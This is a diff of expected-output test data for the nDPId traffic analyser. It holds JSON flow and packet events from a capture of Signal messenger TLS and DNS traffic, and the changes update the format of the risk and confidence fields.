-01309{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
-00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
-00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
-00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-01318{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00899{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}}
+01415{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247603,"flow_last_seen":1569051247830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051247830,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
+00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":72,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247601,"flow_last_seen":1569051247832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"ts_msec":1569051247832,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}}
 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569051248547,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1569051248547,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTAAAP8RkXUAAAAA\/\/\/\/\/wBEAEMBNJw9AQEGACG6jqoABAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569051253252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1569051253252,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKTEAAP8RkXQAAAAA\/\/\/\/\/wBEAEMBNJw4AQEGACG6jqoACQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":149,"source":"signal.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051255515,"flow_last_seen":1569051255515,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"ts_msec":1569051255515,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.146.144","src_port":56996,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -57,7 +57,7 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1569051264078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569051264078,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGSLbAqAIRFzkYEN6+AbvH3a+JAAAAALAC\/\/8ydQAAAgQFtAEDAwcBAQgKKFWSTQAAAAAEAgAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1569051264088,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1569051264088,"pkt":"xiwDYGpkxGGLNYKpCABFAABTylIAAP8Ra+TAqAIRwKgCAdvHADUAPyTGAMEBAAABAAAAAAAAEnRleHRzZWN1cmUtc2VydmljZQ53aGlzcGVyc3lzdGVtcwNvcmcAAAEAAQ=="}
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264088,"flow_last_seen":1569051264088,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569051264088,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"},"dns": {"query":"textsecure-service.whispersystems.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264090,"flow_last_seen":1569051264090,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569051264090,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1569051264090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569051264090,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN6\/Abvpz5RJAAAAALAC\/\/80LQAAAgQFtAEDAwcBAQgKKFWSWgAAAAAEAgAA"}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264091,"flow_last_seen":1569051264091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569051264091,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -66,40 +66,40 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1569051264093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569051264093,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7BAbuYIIuMAAAAALAC\/\/+OlgAAAgQFtAEDAwcBAQgKKFWSWwAAAAAEAgAA"}
